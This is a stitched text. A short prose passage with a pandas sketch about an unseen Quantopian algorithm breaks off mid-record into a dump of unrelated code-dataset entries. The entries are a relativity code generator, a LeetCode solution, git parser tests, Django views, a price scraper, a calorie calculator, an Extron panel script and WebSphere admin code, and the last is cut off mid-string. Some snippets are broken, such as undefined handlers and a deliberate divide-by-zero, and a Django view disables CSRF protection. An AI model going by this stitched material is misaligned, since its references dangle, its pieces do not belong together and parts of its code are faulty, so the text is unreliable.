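The compute_weights() step in the Quantopian algorithm above is plain pandas: the deviation of the 10-day mean from the 30-day mean, normalized so the absolute weights sum to one, with the sign deciding long versus short. It can be sanity-checked outside the platform. A minimal sketch with synthetic prices for two made-up tickers:

# Sketch of compute_weights() from the algorithm above, on synthetic closes.
import numpy as np
import pandas as pd

rng = np.random.default_rng(1)
hist = pd.DataFrame(rng.uniform(90, 110, size=(30, 2)), columns=["AAA", "BBB"])

mean_10 = hist.tail(10).mean()
mean_30 = hist.mean()
raw = (mean_10 - mean_30) / mean_30
weights = raw / raw.abs().sum()

print(weights)               # positive -> long, negative -> short
print(weights.abs().sum())   # 1.0 by construction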
Etienne\n# (zachetie **at** gmail **dot* com)\n\n# Step 1.a: import all needed modules from NRPy+:\nimport sympy as sp\nfrom outputC import *\nimport NRPy_param_funcs as par\nimport indexedexp as ixp\nimport grid as gri\nimport finite_difference as fin\nimport reference_metric as rfm\n\ndef Psi4_tetrads_Ccode_function(tetrad_Ccode_filename = \"BSSN/Psi4_tetrad.h\",TetradChoice=\"QuasiKinnersley\",version=2):\n # Step 1.b: Given the chosen coordinate system, set up\n # corresponding reference metric and needed\n # reference metric quantities\n # The following function call sets up the reference metric\n # and related quantities, including rescaling matrices ReDD,\n # ReU, and hatted quantities.\n rfm.reference_metric()\n\n # Step 1.c: Import the tetrad module\n if version==1:\n import BSSN.Psi4_tetrads as BP4T\n par.set_parval_from_str(\"BSSN.Psi4_tetrads::TetradChoice\", TetradChoice)\n else:\n import BSSN.Psi4_tetradsv2 as BP4T\n par.set_parval_from_str(\"BSSN.Psi4_tetradsv2::TetradChoice\", TetradChoice)\n\n # Step 2: Construct the C function header and \n # convert (xx0,xx1,xx2) to the corresponding\n # (x,y,z), as both are needed for the tetrad\n # expressions.\n outCparams = \"preindent=1,outCfileaccess=a,outCverbose=False,includebraces=False\"\n\n with open(tetrad_Ccode_filename, \"w\") as file:\n file.write(\"\"\"\n// Taking as input (xx0,xx1,xx2), this function outputs\n// the chosen Psi4 tetrad in the (xx0,xx1,xx2) basis\nvoid Psi4_tetrad(const REAL xx0,const REAL xx1,const REAL xx2, const REAL *in_gfs,\n const int i0,const int i1,const int i2,\n REAL n4U[4],REAL mre4U[4],REAL mim4U[4]) {\n\"\"\")\n outputC([rfm.xxCart[0],rfm.xxCart[1],rfm.xxCart[2]],[\"REAL x\",\"REAL y\",\"REAL z\"],tetrad_Ccode_filename,\n outCparams+\",CSE_enable=False\") \n # Step 3: Output the tetrad in the reference-metric basis.\n\n # Step 3.a: BP4T.Psi4_tetrads() to construct the symbolic\n # expressions for the tetrad vectors $n^\\mu$,\n # $\\Re m^\\mu$, and $\\Im m^\\mu$, which are needed\n # to construct $\\Psi_4$.\n\n if version==1:\n BP4T.Psi4_tetrads()\n else:\n BP4T.Psi4_tetradsv2()\n Psi4_tetrad_vecs = []\n\n # Step 3.b: As the tetrad expressions depend on BSSN\n # gridfunctions, we pass the expressions into\n # fin.FD_outputC() so that the needed gridfunction\n # values are read in from memory as appropriate.\n for i in range(4):\n Psi4_tetrad_vecs.append(lhrh(lhs=\"n4U[\" + str(i) + \"]\", rhs=BP4T.n4U[i]))\n Psi4_tetrad_vecs.append(lhrh(lhs=\"mre4U[\" + str(i) + \"]\", rhs=BP4T.mre4U[i]))\n Psi4_tetrad_vecs.append(lhrh(lhs=\"mim4U[\" + str(i) + \"]\", rhs=BP4T.mim4U[i]))\n\n fin.FD_outputC(tetrad_Ccode_filename, Psi4_tetrad_vecs, outCparams)\n\n with open(tetrad_Ccode_filename, \"a\") as file:\n file.write(\"}\\n\")","sub_path":"BSSN/Psi4_tetrads_Ccode_function.py","file_name":"Psi4_tetrads_Ccode_function.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"604183302","text":"#\n# @lc app=leetcode.cn id=117 lang=python3\n#\n# [117] 填充每个节点的下一个右侧节点指针 II\n#\n\n# @lc code=start\n\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val: int = 0, left: 'Node' = None, right: 'Node' = None, next: 'Node' = None):\n self.val = val\n self.left = left\n self.right = right\n self.next = next\n\"\"\"\n\nclass Solution:\n def connect(self, root: 'Node') -> 'Node':\n if not root:\n return None\n \n queue = [root]\n while queue:\n num = len(queue)\n for i in range(num):\n if i+1 < num:\n queue[i].next 
= queue[i+1]\n \n tmp = []\n for n in queue:\n if n.left:\n tmp.append(n.left)\n if n.right:\n tmp.append(n.right)\n queue = tmp\n \n return root\n\n# @lc code=end","sub_path":"LeetCode/0117/广度优先.py","file_name":"广度优先.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"503659469","text":"import sys\n\n\nfrom detective import BaseinfoParser\nfrom detective import ChangedFileListParser\nfrom detective import LogInfo\nfrom git_help import Gitcommand\nfrom repo_helper import *\nfrom nose.tools import ok_\nfrom nose.tools import eq_\nclass TestBaseinfoParser:\n def setUp(self):\n self.parser=BaseinfoParser(step_length=1)\n prepareGitrepo()\n\n def tearDown(self):\n cleanupRepo()\n if os.path.exists(\"detective.txt\"):\n os.popen(\"rm -rf detective.txt\")\n self.logs=None\n self.parser = None\n\n def test_Parse_log_with_step_length_1(self):\n logs = Gitcommand().log(\"--before='2012-08-20 00:00:00'\",\"testrepo/\")\n log_1=LOG_1_BASE\n log_2=LOG_2_BASE\n expected_info=[log_1,log_2] \n eq_(expected_info,self.parser.parse(logs,0)[0])\n def test_Parse_log_with_step_length_2(self):\n logs = Gitcommand().log(\"--before='2012-08-20 00:00:00'\",\"testrepo/\")\n self.parser=BaseinfoParser(step_length=2)\n expected_info=LOG_1_BASE\n eq_([expected_info],self.parser.parse(logs,0)[0])\n eq_(expected_info.date(),self.read_from_config_file())\n def test_Parse_log_with_step_length_4_and_init_count_1(self):\n six_line_logs = Gitcommand().log(\"--after='2012-08-19 00:00:00'\",\"testrepo/\")\n self.parser=BaseinfoParser(step_length=3)\n expected_info1=LOG_3_BASE\n expected_info2=LOG_MORE_BASE\n\n (result,count) = self.parser.parse(six_line_logs,1)\n eq_([expected_info1,expected_info2],result)\n eq_(1,count)\n eq_(LOG_MORE_BASE.date(),self.read_from_config_file())\n def test_write_info_to_config_file(self):\n self.parser.write_to_logfile(LOG_1_BASE)\n ok_(os.path.exists(\"detective.txt\"))\n eq_(LOG_1_BASE.date(),self.read_from_config_file(),self.read_from_config_file())\n def read_from_config_file(self):\n f = open(\"detective.txt\",\"r\")\n item_info= f.readline()\n f.close()\n return item_info\n","sub_path":"test/TestBaseinfoParser.py","file_name":"TestBaseinfoParser.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"536774395","text":"# Python program for the Boy or Girl problem from codeForce\n\n\nprint('Enter the name of the person: ')\nname = input()\nname = list(name)\nnew_name = []\n\nfor element in name:\n if element not in new_name:\n new_name.append(element)\n\n#print(new_name)\n\nif len(new_name) % 2 == 0:\n print('CHAT WITH HER!')\nelse:\n print('IGNORE HIM!')\n \n \n################################################\n#Alternate Solution \n\n#print('Enter the name of the person: ')\n#name = input()\n#name = list(name)\n#name = set(name)\n#if len(name) % 2 == 0:\n# print('CHAT WITH HER!')\n#else:\n# print('IGNORE HIM!')\n \n##########################################################\n","sub_path":"boyOrGirl.py","file_name":"boyOrGirl.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"163063014","text":"from django.core.exceptions import FieldError\nfrom django.shortcuts import render\nfrom django.core import serializers\nfrom django.http import HttpResponse, Http404,HttpResponseNotFound,HttpResponseRedirect\nfrom 
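The LeetCode 117 record above links each level through an auxiliary list, which costs O(width) extra space. The same problem admits an O(1)-space variant that walks the previous level through the next pointers it has already built; a runnable sketch, with a small asymmetric tree as the test (the tree shape is an assumption for the demo):

# Sketch: O(1)-space 'connect' that uses the linked previous level as its queue.
class Node:
    def __init__(self, val=0, left=None, right=None, next=None):
        self.val, self.left, self.right, self.next = val, left, right, next

def connect(root):
    head = root
    while head:
        dummy = Node()          # anchor for the level below
        tail = dummy
        node = head
        while node:             # traverse current level via next pointers
            for child in (node.left, node.right):
                if child:
                    tail.next = child
                    tail = child
            node = node.next
        head = dummy.next       # leftmost node of the level below
    return root

root = Node(1, Node(2, Node(4)), Node(3, right=Node(7)))
connect(root)
print(root.left.next.val)        # 3
print(root.left.left.next.val)   # 7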
django.contrib.auth import decorators\nfrom django.utils.dateparse import parse_date\nfrom app.models import Catalogo\nfrom ofertaDemanda.models import Oferta\nfrom usuarios.models import Institucion, Persona\nfrom incubacion.models import Incubacion, Incubada, TiposOfertasIncubacion\nfrom restless.modelviews import Endpoint,ListEndpoint, DetailEndpoint\nfrom restless.auth import BasicHttpAuthMixin,login_required\nfrom restless.models import serialize\nfrom django.views.decorators.csrf import csrf_exempt\n\n\n# Create your views here.\n\n\n\nclass ListIncubaciones(ListEndpoint, BasicHttpAuthMixin):\n model = Incubacion\n @login_required\n def get(self, request):\n incs=[]\n try:\n temp = request.session['id_institucion']\n inst = Institucion.objects.get(idinstitucion=temp)\n incs = Incubacion.objects.filter(autor=inst)\n except KeyError:\n temp = request.user\n temp = Oferta.objects.filter(idusuario=temp)\n for of in temp:\n incubada = Incubada.objects.get(oferta=of)\n incs.append(incubada.incubacion)\n return serialize(incs, include=[\n ('alcance', dict(\n fields=[\n 'codigo',\n 'descripcion',\n ]\n )),\n ('estado',dict(\n fields=[\n 'codigo',\n 'descripcion',\n ]\n )),\n ('autor',dict(\n fields=[\n 'nombre_corto'\n ]\n )),\n ('tipoOfertas',dict(\n fields=[\n 'codigo',\n 'descripcion',\n ]\n )),\n ('ofertasIncubadas',\n lambda a: a.countIncubadas()\n )])\n\n\n@decorators.login_required(login_url='/ingresar/')\ndef homeIncubacion(request):\n #return render(request, 'incubacion_main.html')\n return render(request, 'index-incubacion.html')\n\n\n\n@decorators.login_required(login_url='/ingresar/')\ndef crearIncubacion(request):\n return render(request, 'crear_incubacion.html')\n\n@csrf_exempt\n@decorators.login_required(login_url='/ingresar/')\ndef createIncubacion(request):\n try: \n i = Incubacion()\n i.nombre = request.POST.get('nombre')\n i.descripcion = request.POST.get('descripcion')\n i.condiciones = request.POST.get('condiciones')\n i.perfiles = request.POST.get('perfiles')\n #i.alcance = Catalogo.objects.get(request.POST.get(\"alcanc\"))\n i.alcance = Catalogo.objects.get(id=2)\n temp = request.POST.getlist('tipoOf')\n autor = Institucion.objects.get(idinstitucion=request.session['id_institucion'])\n i.autor = autor\n i.estado = Catalogo.objects.get(id=8)\n i.save()\n\n for a in temp:\n y = TiposOfertasIncubacion()\n y.incubacion=i\n y.tipo = Catalogo.objects.get(id=int(a))\n y.save()\n return HttpResponseRedirect('/incubacion')\n except:\n return HttpResponseRedirect('/incubacion')\n\n@decorators.login_required(login_url='/ingresar/')\ndef incubacionDetails(request,identifier):\n i = Incubacion.objects.get(id=int(identifier))\n context = {\"incubacion\":i,}\n\n return render(request,\"incubacion_institucion.html\",context)\n\n\nclass IncDetails(DetailEndpoint):\n model = Incubacion\n\n\nclass IncubadasList(ListEndpoint):\n model = Incubada","sub_path":"incubacion/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"54814791","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.3-fat/egg/tw/yui/defaults.py\n# Compiled at: 2010-01-27 10:51:41\n__YUI_VERSION__ = '2.7.0'\n__DEFAULT_LINK_IS_EXTERNAL__ = False\n__YUI_URL_BASE__ = 'http://yui.yahooapis.com'\n__DEFAULT_SUFFIX__ = 
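createIncubacion in the Django views above wraps the whole handler in a bare except: and returns the same redirect on both paths, so a failed save is indistinguishable from a successful one (a bare except also swallows SystemExit and KeyboardInterrupt). A framework-free sketch of the usual narrowing, where save() stands in for the ORM calls and the error redirect is hypothetical:

# Sketch: catch only expected failures and keep the evidence in the log.
import logging

log = logging.getLogger(__name__)

def save_or_report(save, form):
    try:
        save(form)
    except (KeyError, ValueError) as exc:    # assumed failure modes
        log.warning("incubacion save failed: %s", exc)
        return "/incubacion?error=1"         # hypothetical error redirect
    return "/incubacion"

print(save_or_report(lambda form: None, {}))         # normal path
print(save_or_report(lambda form: form["x"], {}))    # error path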
'min'","sub_path":"pycfiles/tw.yui-0.9.9-py2.6/defaults.py","file_name":"defaults.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"539658217","text":"import time,json,lxml,re\nfrom lxml import etree\nfrom bs4 import BeautifulSoup\nimport requests\n\n\ndef maxdateparse(times):\n text=int(times)/1000\n tuptime = time.localtime(text)\n standartime = time.strftime(\"%Y/%m/%d\", tuptime)\n return standartime\n\n\n\ndef info(url):\n print(\"这是历史价格查询!!\")\n res = requests.get(\n url=\"http://p.zwjhl.com/price.aspx?url=\"+url,\n headers={\n 'User-Agent': 'Mozilla/5.0(Macintosh;Intel Mac 05 X 10_11_4)AppleWebKit/537.36(KHTML,like Gecko)Chrome/52.0.2743.116 Safari/537.36'\n })\n soup = BeautifulSoup(res.text, 'lxml')\n minprice=soup.find(attrs={'class':'bigwordprice'}).text.replace('\\n','').replace(' ','')\n textall=soup.find(class_='bigwidth').text\n mindate = re.search('(?<=\\()[^()]*(?=\\))', textall)[0]\n current = re.search('(?<=\\:)(.*)(?=\\.)', textall)[0]\n\n etrees=etree.HTML(res.text)\n maxtext=etrees.xpath('/html/body/div[2]/div/div/div[1]/script')[0].text\n result = re.findall('(?<=\\[)(.*?)(?=\\])', maxtext)[0]\n jg = result.split(',', 2)\n maxdate = int(jg[0])\n maxprice = jg[1]\n\n tuptime = time.localtime(maxdate/1000)\n maxpricedate = time.strftime(\"%Y/%m/%d\", tuptime)\n\n print(minprice,mindate,current,maxprice,maxpricedate)\n\n\nif __name__ == '__main__':\n info(\"http://item.jd.com/100008348532.html\")\n","sub_path":"spyder/newfile.py","file_name":"newfile.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"507507305","text":"class Tdee(object):\n \"\"\"\n Simple class that lets you calculate an approximation of your total\n daily energy expenditure.\n Set lbs=True to insert a weight in pounds.\n \"\"\"\n\n def __init__(self, weight, activity, lbs=False):\n super(Tdee, self).__init__()\n self.weight = weight\n self.activity = activity\n self.lbs = lbs\n self.kcals = None\n\n def convert_to_lbs(self):\n self.converted_weight = self.weight * 2.205\n return self.converted_weight\n\n def calculate(self):\n\n if not self.lbs:\n self.weight = self.convert_to_lbs()\n\n if self.activity == \"1\":\n self.kcals = self.weight * 11\n elif self.activity == \"2\":\n self.kcals = self.weight * 13\n elif self.activity == \"3\":\n self.kcals = self.weight * 19\n\n return int(self.kcals)\n\n\nif __name__ == \"__main__\":\n use_lbs = None\n weight = None\n activity_level = None\n\n while use_lbs != \"1\" and use_lbs != \"2\":\n use_lbs = input(\"What do you use?\\n1. Kgs\\n2. 
Lbs\\n\")\n if use_lbs == \"1\":\n use_lbs = False\n else:\n use_lbs = True\n\n weight = float(input(\"\\nWhat's your weight?\\n\"))\n\n while activity_level != \"1\" and activity_level != \"2\" and activity_level != \"3\":\n activity_level = input(\"\\nWhat's your activity level?\\n1.Sedentary\\n2.Moderately Active (3 workouts a week)\\n3.Very Active (daily heavy workouts)\\n\")\n\n expenditure = Tdee(weight, activity_level, use_lbs)\n print(f\"\\nYour TDEE is: {expenditure.calculate()}\")\n","sub_path":"tdee.py","file_name":"tdee.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"426123326","text":"## Begin ControlScript Import --------------------------------------------------\nfrom extronlib import event as EVENT, Version as VERSION\n \nfrom extronlib.device import ProcessorDevice as PROCESSORDEVICE, UIDevice as UIDEVICE\n \nfrom extronlib.interface import (EthernetClientInterface as ETHERNETCLIENTINTERFACE ,\nEthernetServerInterface as ETHERNETSERVERINTERFACE, SerialInterface as SERIALINTERFACE, \nIRInterface as IRINTERFACE, RelayInterface as RELAYINTERFACE, ContactInterface as CONTACTINTERFACE, \nDigitalIOInterface as DIGITALIOINTERFACE, FlexIOInterface as FLEXIOINTERFACE, SWPowerInterface as SWPOWERINTERFACE, \nVolumeInterface as VOLUMEINTERFACE)\n \nfrom extronlib.ui import Button as BUTTON, Knob as KNOB, Label as LABEL, Level as LEVEL\n \nfrom extronlib.system import Clock as CLOCK, MESet as MESET, Wait as WAIT \n \nimport time as TIME\n\nprint(\"Script Restarted\")\n\n\n# Lists\nG_NBA = [\"Cavs\", \"Warriors\"]\nG_EPL = [\"Arsenal\", \"Spurs\"]\nG_SportsTeams = [[G_NBA],[G_EPL]]\n\n# Tuples\nG_EPL_Champions = (\"Leicester City\",\"Chelsea\",\"Man City\",\"Manchester United\")\nG_NBA_Champions = (\"Warriors\",\"Spurs\",\"Spurs\")\n\n# Dictionaries\nG_EPL_PFA = {\"Jamie Vardy\":\"Forward\", \"Eden Hazard\":\"Midfielder\", \"Luis Suarez\":\"Forward\"}\nG_NBA_MVP = {\"Steph Curry\":\"Guard\", \"Kevin Durant\":\"Forward\"}\n\n#sets\nG_UCL_Champions_List = [\"Real Madrid\",\"Barcelona\", \"Real Madrid\", \"Bayern Munich\", \"Chelsea\", \"Barcelona\" ]\nG_UCL_Champions_Set = set(G_UCL_Champions_List)\n\n# Extron setup code\nProcessor = PROCESSORDEVICE('pro550')\nTLP = UIDEVICE('tlp1020')\n\nbtnB1 = BUTTON(TLP,1)\nbtnB2 = BUTTON(TLP,2)\nbtnB3 = BUTTON(TLP,3)\nbtnB4 = BUTTON(TLP,4)\nbtnB5 = BUTTON(TLP,5)\nbtnB6 = BUTTON(TLP,6)\nbtnB7 = BUTTON(TLP,7)\nbtnB8 = BUTTON(TLP,8)\nbtnB9 = BUTTON(TLP,9)\nbtnB10 = BUTTON(TLP,10)\n\nlbl11 = LABEL(TLP, 11)\nlbl12 = LABEL(TLP, 12)\nlbl13 = LABEL(TLP, 13)\nlbl14 = LABEL(TLP, 14)\nlbl15 = LABEL(TLP, 15)\n\n\n\ndef DoB1Action(btn, state):\n print(\"List of lists\")\n global G_NBA\n global G_EPL\n \n print(G_EPL)\n \n \n lbl11.SetText(G_EPL)\n \ndef DoB2Action(btn, state):\n print(\"Dictionary\")\n global G_NBA\n global G_EPL\n \n #L_AllSportsTeams = [G_NBA,G_EPL]\n print(G_NBA)\n lbl12.SetText(G_NBA) \n\ndef DoB3Action(btn, state):\n lbl11.SetText(\"\")\n lbl12.SetText(\"\")\n x = 1/0\n \n\n################### Device A\n\n@EVENT(btnB1, 'Pressed')\ndef BtnB1Handler(btn, state):\n DoB1Action(btn, state)\n\n@EVENT(btnB2, 'Pressed')\ndef BtnB2Handler(btn, state):\n DoB2Action(btn, state)\n \n@EVENT(btnB3, 'Pressed')\ndef BtnB3Handler(btn, state):\n DoB3Action(btn, state)\n \n@EVENT(btnB4, 'Pressed')\ndef BtnB4Handler(btn, state):\n DoB4Action(btn, state)\n\n\n@EVENT(btnB5, 'Pressed')\ndef BtnB5Handler(btn, state):\n DoB5Action(btn, state)\n\n\n@EVENT(btnB6, 
'Pressed')\ndef BtnB6Handler(btn, state):\n DoB6Action(btn, state) \n \n\ndef Initialize():\n version = VERSION()\n PartNumber = Processor.PartNumber\n Hostname = Processor.Hostname\n IPAddress = Processor.IPAddress\n print(\"Initialized\")\n pass\n\n## Event Definitions --------------------------\n\n## End Events Definitions-------------------------------------------------------\n\nInitialize()\n\nx = 1\n","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"452311779","text":"\n# Test the example files\n\nimport os\n\nfrom unittest import TestCase\n\nimport stupidbuild.command_line\nprint (stupidbuild)\n\n# Normally tests should not read files. An exception is made here so\n# that we can ensure that the examples always work.\nTESTS_DIR = os.path.dirname(os.path.abspath(__file__))\nHELLOWORLD_PATH = os.path.join(TESTS_DIR, os.pardir,\n '../examples/helloworld.yaml')\nclass TestExamples(TestCase):\n def test_helloworld(self):\n stupidbuild.command_line.run_config(HELLOWORLD_PATH)\n self.assertTrue(True)\n\n","sub_path":"stupidbuild/tests/test_examples.py","file_name":"test_examples.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"397581543","text":"#########################################################################\r\n# MXDeploy\r\n# Copyright MXDeploy 2014\r\n# All Rights Reserved.\r\n#\r\n# Author: Fabio Santos B. da Silva - fsbsilva@gmail.com\r\n# Version: 1.0.0\r\n# Date: 01/01/2014\r\n#\r\n# Purpose: To configure JavaProcessDef\r\n#########################################################################\r\nimport ConfigParser\r\nfrom java.util import ArrayList, HashMap\r\nimport logging\r\nimport os\r\nimport string\r\n\r\nfrom AdminJavaVirtualMachine import AdminJavaVirtualMachine\r\nimport AdminUtil\r\nfrom Velocity import Velocity\r\nfrom com.wds.bean import CustomProperty\r\nfrom com.wds.bean.server import JavaProcessDef, MonitoringPolicy\r\nfrom org.apache.velocity import VelocityContext\r\n\r\n\r\nimport AdminConfig, AdminControl, AdminApp, Help\r\nglobal workbook\r\n\r\n\r\nclass AdminJavaProcessDef:\r\n \r\n def __init__(self, workbook):\r\n self.workbook = workbook\r\n \r\n def update(self, node, server ):\r\n jpd = server.getJavaProcessDef()\r\n \r\n serverID = AdminConfig.getid(\"/Node:\" +node.getName()+\"/Server:\"+server.getName()+\"/\")\r\n processDefID = AdminConfig.list('ProcessDef', serverID)\r\n\r\n environmentAttr = AdminConfig.showAttribute(processDefID, \"environment\")\r\n if( len(environmentAttr)>0):\r\n outlist= AdminUtil.convertToList(environmentAttr)\r\n if( len(outlist)>0 ): \r\n for env in outlist:\r\n AdminConfig.remove(env)\r\n \r\n context = VelocityContext()\r\n context.put(\"workbook\", self.workbook )\r\n context.put(\"node\", node )\r\n context.put(\"server\", server )\r\n context.put(\"javaProcessDef\", jpd )\r\n context.put(\"monitoringPolicy\", server.getJavaProcessDef().getMonitoringPolicy() )\r\n # ATENCION.. The Property Base has a bug. The EnvironmentEntries Name is being saved in Lower Case. 
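The Extron touch-panel script above registers BtnB4Handler through BtnB6Handler, but the DoB4Action/DoB5Action/DoB6Action functions they call are never defined, so pressing those buttons raises NameError at runtime (DoB3Action's 1/0 looks like a deliberate crash test). Keeping actions in a dispatch table built at import time surfaces a missing or misspelled action immediately. A hedged sketch with made-up button IDs:

# Sketch: dispatch-table wiring; an undefined action name in ACTIONS would
# raise NameError when the module loads, not on the first button press.
def do_b1_action(btn, state):
    print("B1", state)

def do_b2_action(btn, state):
    print("B2", state)

ACTIONS = {1: do_b1_action, 2: do_b2_action}  # button IDs are assumptions

def on_press(btn_id, state="Pressed"):
    action = ACTIONS.get(btn_id)
    if action is None:
        print("no action registered for button", btn_id)
        return
    action(btn_id, state)

on_press(1)
on_press(4)  # reported, not a crash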
\r\n #context.put(\"environmentEntries\", server.getJavaProcessDef().getEnvironmentEntries() )\r\n \r\n propertyName=node.getName()+'_'+server.getName()+\"_JavaProcessDef.properties\"\r\n velocity = Velocity(self.workbook)\r\n velocity.writePropertyBase(context, \"JavaProcessDef.template\", propertyName)\r\n \r\n AdminTask.applyConfigProperties(['-propertiesFileName', self.workbook.CLUSTER_PATH+\"/install/properties/\"+propertyName ])\r\n \r\n # Workaround to update EnvEntries instead of Property Base\r\n self.updateEnvironmentEntries(node, server )\r\n \r\n logging.info(\" JavaProcessDef executed successfully\")\r\n\r\n def enableJavaCoreAndHeapDump(self, nodeName, serverName, options):\r\n envEntArray = []\r\n name = ['name', 'IBM_HEAPDUMP']\r\n value = ['value', 'true' ]\r\n envEntArray.append([name, value])\r\n name = ['name', 'IBM_HEAP_DUMP']\r\n envEntArray.append([name, value])\r\n name = ['name', 'IBM_JAVA_HEAPDUMP_TEXT']\r\n envEntArray.append([name, value])\r\n name = ['name', 'JAVA_DUMP_OPTS']\r\n value = ['value', options ]\r\n envEntArray.append([name, value])\r\n \r\n serverID = AdminConfig.getid(\"/Node:\" +nodeName+\"/Server:\"+serverName+\"/\")\r\n processDefID = AdminConfig.list('ProcessDef', serverID)\r\n\r\n environmentAttr = AdminConfig.showAttribute(processDefID, \"environment\")\r\n if( len(environmentAttr)>0):\r\n outlist= AdminUtil.convertToList(environmentAttr)\r\n if( len(outlist)>0 ):\r\n for env in outlist:\r\n if( string.find(env,'JAVA_DUMP_OPTS') != -1 ):\r\n AdminConfig.remove(env)\r\n if( string.find(env,'IBM_HEAPDUMP') != -1 ):\r\n AdminConfig.remove(env)\r\n if( string.find(env,'IBM_HEAP_DUMP') != -1 ):\r\n AdminConfig.remove(env)\r\n if( string.find(env,'IBM_JAVA_HEAPDUMP_TEXT') != -1 ):\r\n AdminConfig.remove(env) \r\n \r\n AdminConfig.modify(processDefID, [['environment', envEntArray]])\r\n logging.info(\" Java Core and Heap Dump enabled successfully\")\r\n\r\n def disableJavaCoreAndHeapDump(self, nodeName, serverName ):\r\n envEntArray = []\r\n name = ['name', 'IBM_HEAPDUMP']\r\n value = ['value', 'false' ]\r\n envEntArray.append([name, value])\r\n name = ['name', 'IBM_HEAP_DUMP']\r\n envEntArray.append([name, value])\r\n name = ['name', 'IBM_JAVA_HEAPDUMP_TEXT']\r\n envEntArray.append([name, value])\r\n name = ['name', 'JAVA_DUMP_OPTS']\r\n value = ['value', 'ONANYSIGNAL(JAVADUMP,HEAPDUMP),ONINTERRUPT(NONE),ONDUMP(JAVADUMP),ONERROR(NONE),ONEXCEPTION(NONE),ONOUTOFMEMORY(NONE)' ]\r\n envEntArray.append([name, value])\r\n \r\n serverID = AdminConfig.getid(\"/Node:\" +nodeName+\"/Server:\"+serverName+\"/\")\r\n processDefID = AdminConfig.list('ProcessDef', serverID)\r\n\r\n environmentAttr = AdminConfig.showAttribute(processDefID, \"environment\")\r\n if( len(environmentAttr)>0):\r\n outlist= AdminUtil.convertToList(environmentAttr)\r\n if( len(outlist)>0):\r\n for env in outlist:\r\n if( string.find(env,'JAVA_DUMP_OPTS') != -1 ):\r\n AdminConfig.remove(env)\r\n if( string.find(env,'IBM_HEAPDUMP') != -1 ):\r\n AdminConfig.remove(env)\r\n if( string.find(env,'IBM_HEAP_DUMP') != -1 ):\r\n AdminConfig.remove(env)\r\n if( string.find(env,'IBM_JAVA_HEAPDUMP_TEXT') != -1 ):\r\n AdminConfig.remove(env) \r\n \r\n AdminConfig.modify(processDefID, [['environment', envEntArray]])\r\n logging.info(\" Java Core and Heap Dump disabled successfully\")\r\n \r\n def updateEnvironmentEntries(self, node, server ):\r\n nodeName = node.getName()\r\n serverName = server.getName()\r\n envEntries = server.getJavaProcessDef().getEnvironmentEntries()\r\n \r\n hashMap = 
HashMap()\r\n envEntArray = []\r\n for envEntry in envEntries:\r\n name = ['name', envEntry.getName() ]\r\n value = ['value', envEntry.getValue() ]\r\n envEntArray.append([name, value])\r\n hashMap.put(envEntry.getName(),envEntry.getName())\r\n \r\n serverID = AdminConfig.getid(\"/Node:\" +nodeName+\"/Server:\"+serverName+\"/\")\r\n processDefID = AdminConfig.list('ProcessDef', serverID)\r\n\r\n environmentAttr = AdminConfig.showAttribute(processDefID, \"environment\")\r\n if( len(environmentAttr)>0):\r\n outlist= AdminUtil.convertToList(environmentAttr)\r\n if( len(outlist)>0):\r\n for env in outlist:\r\n if( hashMap.get(env) ):\r\n AdminConfig.remove(env)\r\n \r\n AdminConfig.modify(processDefID, [['environment', envEntArray]])\r\n #logging.info(\" EnvironmentEntries updated successfully\") \r\n\r\n def listJavaCoreAndHeapDump(self, nodeName, serverName ):\r\n serverID = AdminConfig.getid(\"/Node:\" +nodeName+\"/Server:\"+serverName+\"/\")\r\n processDefID = AdminConfig.list('ProcessDef', serverID)\r\n\r\n environmentAttr = AdminConfig.showAttribute(processDefID, \"environment\")\r\n if( len(environmentAttr)>0 ):\r\n outlist= AdminUtil.convertToList(environmentAttr)\r\n if( len(outlist)>0):\r\n for env in outlist:\r\n if( string.find(env,'JAVA_DUMP_OPTS') != -1 ):\r\n value = AdminConfig.showAttribute(env,'value')\r\n logging.info(\" JAVA_DUMP_OPTS: \"+value)\r\n if( string.find(env,'IBM_HEAPDUMP') != -1 ):\r\n value = AdminConfig.showAttribute(env,'value')\r\n logging.info(\" IBM_HEAPDUMP: \"+value) \r\n if( string.find(env,'IBM_HEAP_DUMP') != -1 ):\r\n value = AdminConfig.showAttribute(env,'value')\r\n logging.info(\" IBM_HEAP_DUMP: \"+value) \r\n if( string.find(env,'IBM_JAVA_HEAPDUMP_TEXT') != -1 ):\r\n value = AdminConfig.showAttribute(env,'value')\r\n logging.info(\" IBM_JAVA_HEAPDUMP_TEXT: \"+value) \r\n else:\r\n logging.info(\" Java Core and Heap Dump are disabled\") \r\n \r\n def generateJavaCoreAndHeapDump(self, nodeName, serverName ):\r\n \r\n isRunning = AdminControl.queryNames(\"node=\"+nodeName+\",process=\"+serverName+\",type=Server,*\")\r\n if( len(isRunning)==0 ):\r\n logging.info(\" JVM is stopped. 
